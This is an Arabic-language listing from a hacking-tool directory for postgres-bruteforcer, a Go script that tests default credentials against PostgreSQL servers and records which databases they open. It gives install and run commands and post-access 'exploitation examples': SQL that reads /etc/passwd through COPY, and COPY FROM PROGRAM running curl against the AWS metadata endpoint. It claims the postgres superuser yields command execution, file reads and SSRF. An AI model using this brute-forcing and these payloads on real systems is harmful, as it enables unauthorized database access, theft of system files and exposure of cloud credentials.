Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
postgres-bruteforcer — تأخذ هذه الأداة قائمةً من بيانات الاعتماد الافتراضية وتختبرها ضد خادم PostgreSQL، ثم تسجّل أيًّا منها يعمل وقواعد البيانات التي يمنح الوصول إليها. | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/postgres-bruteforcer
هجمات كلمات المرورالاستغلالاختبار الاختراقالمصادقةأمن قواعد البيانات
GitHubrandomrobbiebf/postgres-bruteforcer

postgres-bruteforcer

تأخذ هذه الأداة قائمةً من بيانات الاعتماد الافتراضية وتختبرها ضد خادم PostgreSQL، ثم تسجّل أيًّا منها يعمل وقواعد البيانات التي يمنح الوصول إليها.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
22منذ 3 سنواتلم تتم المراجعة بعد

postgres-bruteforcer

حول

يقوم هذا السكربت المكتوب بلغة Go بقراءة قائمة بأسماء المستخدمين وكلمات المرور من ملف باسم creds.txt ويختبرها ضد قاعدة بيانات PostgreSQL.

يقبل السكربت عنوان IP لخادم PostgreSQL كوسيط سطر أوامر أو ملف نصي يحتوي على عناوين IP.

إذا تم منح الوصول، يكتب السكربت هذا المخرج إلى ملف باسم pg-output.txt.

إذا كان المستخدم postgres متاحًا، فهو عادةً مستخدم خارق (super user) يمكنه السماح بتنفيذ أوامر (RCE) أو قراءة ملفات محلية (LFI) أو طلبات من الخادم (SSRF).

طريقة التثبيت

root@kitploit:~
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest

طريقة التشغيل

root@kitploit:~
go run postgres-brute.go 1.1.1.1

postgres

أمثلة على الاستغلال

قراءة ملف /etc/passwd/

root@kitploit:~
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;

SSRF - الوصول إلى بيانات AWS الوصفية

root@kitploit:~
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;
تنزيل الأداة